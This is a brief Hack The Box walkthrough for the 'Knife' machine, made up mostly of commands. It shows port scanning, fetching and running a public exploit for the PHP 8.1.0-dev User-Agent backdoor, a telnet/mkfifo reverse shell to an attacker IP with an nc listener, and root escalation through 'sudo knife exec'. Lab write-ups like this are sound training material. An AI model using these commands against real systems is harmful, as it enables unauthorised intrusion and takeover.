Knife - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.242
- Whatweb
whatweb http://10.10.10.242/
Exploitation
- PHP 8.1.0-dev User Agent RCE
searchsploit php 8.1.0-dev
searchsploit -m php/webapps/49933.py
python3 49933.py
- Send reverse shell
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.16.7 9000 0<$TF | /bin/bash 1>$TF
nc -nlvp 9000
Post-exploitation
- Check sudoers
sudo -l
- Knife Sudoers
sudo knife exec -E 'exec "/bin/sh"'